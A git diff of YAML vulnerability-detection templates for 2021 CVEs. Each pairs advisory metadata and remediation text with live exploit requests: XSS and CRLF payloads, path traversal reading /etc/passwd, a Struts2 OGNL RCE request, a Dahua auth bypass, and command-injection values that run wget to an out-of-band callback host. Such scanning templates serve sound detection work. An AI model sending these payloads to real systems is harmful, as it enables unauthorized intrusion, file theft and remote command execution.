https://www.chiyu-tech.com/msg/message-Firmware-update-87.html - - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-31249 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.5 - cve-id: CVE-2021-31249 - cwe-id: CWE-74 - epss-score: 0.00331 - epss-percentile: 0.67922 - cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: chiyu-tech - product: bf-430_firmware tags: cve,cve2021,chiyu,crlf,iot - -http: +requests: - method: GET path: - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" - matchers-condition: and matchers: + - type: status + status: + - 302 - type: word part: header words: - "Location: setting.htm" - "" condition: and - - - type: status - status: - - 302 -# digest: 4b0a00483046022100b9fd992e56cef1cae265c5114bb535a0cf5365eaa7d1e472d707c9eda18227ca022100d2c6f3e7e6534e3b545c881f4608440d05047a3c3c0c6d06aacdd66bf66cf350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31589.yaml b/poc/cve/CVE-2021-31589.yaml index 1be8932582..3cfe16bdb5 100644 --- a/poc/cve/CVE-2021-31589.yaml +++ b/poc/cve/CVE-2021-31589.yaml @@ -1,35 +1,50 @@ id: CVE-2021-31589 + info: - name: BeyondTrust Remote Support Reflected XSS + name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting author: Ahmed Abou-Ela severity: medium - description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. + description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML. + remediation: | + Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability. + reference: + - https://packetstormsecurity.com/files/165408 + - https://cxsecurity.com/issue/WLB-2022010013 + - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb + - https://www.beyondtrust.com/docs/release-notes/index.htm + - https://nvd.nist.gov/vuln/detail/CVE-2021-31589 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-31589 cwe-id: CWE-79 + epss-score: 0.00286 + epss-percentile: 0.65338 + cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: beyondtrust + product: appliance_base_software shodan-query: 'set-cookie: nsbase_session' - google-dork: '"BeyondTrust" "Redistribution Prohibited"' - reference: - - https://packetstormsecurity.com/files/165408 - - https://cxsecurity.com/issue/WLB-2022010013 - - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb - tags: cve,cve2021,beyondtrust,bomgar,xss -requests: + google-query: '"BeyondTrust" "Redistribution Prohibited"' + tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar + +http: - method: GET path: - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" + matchers-condition: and matchers: - type: word - case-insensitive: true part: body words: - '' - 'bomgar' + case-insensitive: true condition: and + - type: status status: - 200 +# digest: 4b0a00483046022100ad165a66e5d179b7dcb09eff0e9263182cbe1c89b7901a9b199e9a17f3eb8969022100c7d1d2528a4d707531f925eba15e79e59086b98c55f4c8fb83b9a8952dc81dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31682.yaml b/poc/cve/CVE-2021-31682.yaml index 1f8b37310f..9c2b058981 100644 --- a/poc/cve/CVE-2021-31682.yaml +++ b/poc/cve/CVE-2021-31682.yaml @@ -1,52 +1,36 @@ id: CVE-2021-31682 - info: - name: WebCTRL OEM <= 6.5 - Cross-Site Scripting + name: WebCTRL OEM - Reflected XSS author: gy741,dhiyaneshDk severity: medium - description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. - remediation: | - Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682). + description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS - - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ - - http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-31682 cwe-id: CWE-79 - epss-score: 0.00377 - epss-percentile: 0.69811 - cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* + tags: cve,cve2021,webctrl,xss metadata: - max-request: 1 - vendor: automatedlogic - product: webctrl - shodan-query: html:"/_common/lvl5/dologin.jsp" - tags: cve,cve2021,webctrl,xss,packetstorm - -http: + shodan-query: 'html:"/_common/lvl5/dologin.jsp"' +requests: - method: GET path: - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: body + condition: and words: - '">' - 'common/lvl5' - condition: and - - type: word part: header words: - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a00473045022015a279d56f5bead1ab7474fa6bb6f41c368ba08138e2546358e406ffe635664d022100de056a39b87a383ef5d9973bf583912aa9d0915bbe46a951067e29e626359bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-31805.yaml b/poc/cve/CVE-2021-31805.yaml index df9a9bb1be..8b70dbaa8d 100644 --- a/poc/cve/CVE-2021-31805.yaml +++ b/poc/cve/CVE-2021-31805.yaml @@ -1,32 +1,21 @@ id: CVE-2021-31805 - info: name: Apache Struts2 S2-062 - Remote Code Execution author: taielab severity: critical description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. reference: - https://cwiki.apache.org/confluence/display/WW/S2-062 - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - - http://www.openwall.com/lists/oss-security/2022/04/12/6 - - https://security.netapp.com/advisory/ntap-20220420-0001/ + remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-31805 cwe-id: CWE-917 - epss-score: 0.06791 - epss-percentile: 0.93149 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: apache - product: struts - tags: cve,cve2021,apache,rce,struts,struts2,intrusive - -http: + tags: cve,cve2021,apache,rce,struts,struts2 +requests: - raw: - | POST / HTTP/1.1 @@ -50,10 +39,10 @@ http: } ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - type: regex part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502210096b78f88afbd97efae6bf80b46370105d936cf83b10f852670f9301629265b6d02203daf89471c5da7f540634021310e1d43efcbedc48536f60b849faf0a8535de4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/21 diff --git a/poc/cve/CVE-2021-3223.yaml b/poc/cve/CVE-2021-3223.yaml index e2935f0f73..8507a7009f 100644 --- a/poc/cve/CVE-2021-3223.yaml +++ b/poc/cve/CVE-2021-3223.yaml @@ -1,50 +1,35 @@ id: CVE-2021-3223 - info: - name: Node RED Dashboard <2.26.2 - Local File Inclusion + name: Node RED Dashboard - Directory Traversal author: gy741,pikpikcu severity: high - description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. - remediation: | - Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. + description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. reference: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3223 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3223 cwe-id: CWE-22 - epss-score: 0.11532 - epss-percentile: 0.94684 - cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true - max-request: 2 - vendor: nodered - product: node-red-dashboard - framework: node.js shodan-query: title:"Node-RED" fofa-query: title="Node-RED" tags: cve,cve2021,node-red-dashboard,lfi - -http: +requests: - method: GET path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - matchers-condition: or matchers: - - type: word - part: body - words: - - "Node-RED web server is listening" - - type: regex part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402202e9724b5de55a2645274dd7e13367a2efbd8c60679ac00089a184aec8090ddca0220562846065a2fb3ec5cfcdd988b4bad30589d3c9529be7ed908122b60935c4e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - "Node-RED web server is listening" diff --git a/poc/cve/CVE-2021-32305.yaml b/poc/cve/CVE-2021-32305.yaml index 5c6c729e5b..d0d5e7eb16 100644 --- a/poc/cve/CVE-2021-32305.yaml +++ b/poc/cve/CVE-2021-32305.yaml @@ -1,9 +1,12 @@ id: CVE-2021-32305 + info: name: Websvn <2.6.1 - Remote Code Execution author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + remediation: | + Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html - https://github.com/websvnphp/websvn/pull/142 @@ -14,18 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - tags: cve,cve2021,websvn,rce,oast -requests: + epss-score: 0.96769 + epss-percentile: 0.99586 + cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: websvn + product: websvn + tags: cve,cve2021,websvn,rce,oast,packetstorm + +http: - raw: - | GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/18 +# digest: 4b0a00483046022100805b5332de5210648d6ced01c5406cb8551c2d0c7f41a69bbcd3f23f10093386022100ed0719e61e9ab5d250703abf2fd2e8c5f1064ed7c65d2adeef6fe1e2182936c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-32618.yaml b/poc/cve/CVE-2021-32618.yaml index 1b6f758626..679b5152a5 100644 --- a/poc/cve/CVE-2021-32618.yaml +++ b/poc/cve/CVE-2021-32618.yaml @@ -1,28 +1,38 @@ id: CVE-2021-32618 info: - name: Flask Open Redirect + name: Python Flask-Security - Open Redirect author: 0x_Akoko severity: medium - description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com. + description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability. reference: - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c - https://github.com/Flask-Middleware/flask-security/issues/486 - https://nvd.nist.gov/vuln/detail/CVE-2021-32618 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-32618 cwe-id: CWE-601 + epss-score: 0.00104 + epss-percentile: 0.42377 + cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: flask-security_project + product: flask-security tags: cve,cve2021,redirect,flask -requests: +http: - method: GET path: - - '{{BaseURL}}/login?next=\\\example.com' + - '{{BaseURL}}/login?next=\\\interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a004730450221009d58e35269b9bd5391e66fc445890b9c53aab334a1830c102c66190de8db39d402207c328ae59293633603120123faa53d58ccf802a32087d6a4353b43581e34167b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-33044.yaml b/poc/cve/CVE-2021-33044.yaml index 6a8a3d2af4..59c60d4854 100644 --- a/poc/cve/CVE-2021-33044.yaml +++ b/poc/cve/CVE-2021-33044.yaml @@ -1,32 +1,22 @@ id: CVE-2021-33044 info: - name: Dahua IPC/VTH/VTO - Authentication Bypass + name: Dahua IPC/VTH/VTO devices Authentication Bypass author: gy741 severity: critical - description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. - remediation: | - Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability. + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - - https://www.dahuasecurity.com/support/cybersecurity/details/957 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-33044 cwe-id: CWE-287 - epss-score: 0.30474 - epss-percentile: 0.96491 - cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dahuasecurity - product: ipc-hum7xxx_firmware - tags: dahua,cve,cve2021,auth-bypass,seclists + tags: dahua,cve,cve2021,auth-bypass -http: +requests: - raw: - | POST /RPC2_Login HTTP/1.1 @@ -42,6 +32,11 @@ http: matchers-condition: and matchers: + + - type: status + status: + - 200 + - type: word part: body words: @@ -51,15 +46,9 @@ http: - 'session' condition: and - - type: status - status: - - 200 - extractors: - type: regex group: 1 + part: body regex: - ',"result":true,"session":"([a-z]+)"\}' - part: body - -# digest: 4a0a00473045022043730e623d6412b5c4b6c509d7f7713cdc024a7a93fd3872fd78af6245c380dc022100e6a8cbf46005828790d397d9f7ca04344faa72c547c443093ff615f7d89b57ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-33544.yaml b/poc/cve/CVE-2021-33544.yaml index 78779b5b28..ed0ec7d027 100644 --- a/poc/cve/CVE-2021-33544.yaml +++ b/poc/cve/CVE-2021-33544.yaml @@ -1,23 +1,42 @@ id: CVE-2021-33544 + info: - name: Geutebruck RCE - description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + name: Geutebruck - Remote Command Injection author: gy741 - severity: critical - reference: | + severity: high + description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability. + reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ - tags: cve,cve2021,geutebruck,rce,oob -requests: + - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ + - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33544 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-33544 + cwe-id: CWE-78 + epss-score: 0.9752 + epss-percentile: 0.99986 + cpe: cpe:2.3:h:geutebrueck:g-cam_ebc-2110:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: geutebrueck + product: g-cam_ebc-2110 + tags: cve,cve2021,geutebruck,rce,oast + +http: - raw: - | GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Cache-Control: max-age=0 - Connection: keep-alive + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# digest: 4a0a00473045022008ad1016138dd94be3c008057cd98c578852cd34542418ef69bbe2105a62218f022100b3473394b34f254d77d17634896eb71c13c9755657653333ef3f78cd5ad4f2c6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-33807.yaml b/poc/cve/CVE-2021-33807.yaml index 4acf49004b..9cdd98988d 100644 --- a/poc/cve/CVE-2021-33807.yaml +++ b/poc/cve/CVE-2021-33807.yaml @@ -5,34 +5,46 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 - tags: cve,cve2021,lfi,gespage + - https://www.gespage.com/cartadis-db/ + - https://www.cartadis.com/gespage-website/ + - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 + epss-score: 0.01682 + epss-percentile: 0.86287 + cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: gespage + product: gespage + tags: cve,cve2021,lfi,gespage -requests: +http: - method: GET path: - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log" matchers-condition: and matchers: - - type: word + part: body words: - "NetpDoDomainJoin:" - part: body - type: word + part: header words: - "application/octet-stream" - part: header - type: status status: - 200 +# digest: 4a0a00473045022100bb8cb970059144b7ea82fb9f2b670f8dd305a28cbeb0c0816d89c700a84d6d19022054ad0173937366433f15c9f005f06a383e04647457228a49d2eada71988c093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-34370.yaml b/poc/cve/CVE-2021-34370.yaml index 8973cec47a..52641cadd1 100644 --- a/poc/cve/CVE-2021-34370.yaml +++ b/poc/cve/CVE-2021-34370.yaml @@ -1,17 +1,39 @@ id: CVE-2021-34370 + info: - name: Accela Civic Platform 21.1 - Open Redirect & XSS + name: Accela Civic Platform <=21.1 - Cross-Site Scripting author: 0x_Akoko - description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 - reference: https://www.exploit-db.com/exploits/49990 severity: medium - tags: xss,redirect,cves -requests: + description: Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL. + remediation: | + Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization. + reference: + - https://www.exploit-db.com/exploits/49990 + - https://www.accela.com/civic-platform/ + - https://gist.github.com/0xx7/7e9f1b725f7ff98b9239d3cb027b7dc8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 + epss-score: 0.00183 + epss-percentile: 0.55492 + cpe: cpe:2.3:a:accela:civic_platform:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: accela + product: civic_platform + tags: xss,redirect,cve,cve2021,accela,edb + +http: - method: GET path: - - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/" + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a0047304502202ba92da2ff45aa587359de79b28935deb9d42d230d3119265d8ec7f35a86beed022100f1bf06f9cabaf85f7ec08ba18ec12879f0e02522161be1842310869cc189fc1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-34643.yaml b/poc/cve/CVE-2021-34643.yaml index 7828497ddc..5a6cd61db5 100644 --- a/poc/cve/CVE-2021-34643.yaml +++ b/poc/cve/CVE-2021-34643.yaml @@ -1,33 +1,19 @@ id: CVE-2021-34643 - info: - name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting + name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium - description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. - remediation: | - Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. + description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 - - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657 - - https://nvd.nist.gov/vuln/detail/CVE-2021-34643 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-34643 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45221 - cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: skaut-bazar_project - product: skaut-bazar - framework: wordpress - tags: wpscan,wordpress,cve,cve2021,wp-plugin,authenticated - -http: + tags: wordpress,cve,cve2021,wp-plugin,authenticated +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -40,20 +26,17 @@ http: - | GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "" - + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a004730450221008213006f9d2edd7d23fa5c75d0c2a2c694269e310390d70f5a41760393e95e360220524f58e7005ea2d999659322eecd74d47ddbf69374f896b1f6a67b6a7e49af90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-35265.yaml b/poc/cve/CVE-2021-35265.yaml index 7db13f166a..013ce549c4 100644 --- a/poc/cve/CVE-2021-35265.yaml +++ b/poc/cve/CVE-2021-35265.yaml @@ -1,59 +1,33 @@ id: CVE-2021-35265 - info: - name: MaxSite CMS > V106 - Cross-Site Scripting + name: MaxSite CMS XSS author: pikpikcu severity: medium - description: | - A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page." - remediation: | - Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265). + description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a + tags: cve,cve2021,maxsite,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-35265 cwe-id: CWE-79 - epss-score: 0.00127 - epss-percentile: 0.47124 - cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: maxsite - product: maxsite_cms - shodan-query: html:'content="MaxSite CMS' - tags: cve,cve2021,maxsite,xss - -http: +requests: - method: GET path: - - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - + - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word - part: body words: - - '>' - - - type: word + - '' part: body - words: - - 'mso-comments-rss">RSS' - - 'MaxSite CMS' - - 'feed">RSS' - condition: or - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a0046304402203b5c12a3e6807470ad68645b9e3c17ba6b1b0394eec9037b6cea6d0fde41ccf4022013e4080cece77dd6e748ef4fefd17d2ef17a07632a66a69b73fcebfa31df7f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-35587.yaml b/poc/cve/CVE-2021-35587.yaml index e7ae22068a..cf3365bc6a 100644 --- a/poc/cve/CVE-2021-35587.yaml +++ b/poc/cve/CVE-2021-35587.yaml @@ -1,55 +1,38 @@ id: CVE-2021-35587 - info: - name: Oracle Access Manager - Remote Code Execution + name: Pre-auth RCE in Oracle Access Manager author: cckuailong - severity: critical description: | - The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. - remediation: | - Apply the latest security patches provided by Oracle to mitigate this vulnerability. + Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. + severity: critical reference: - 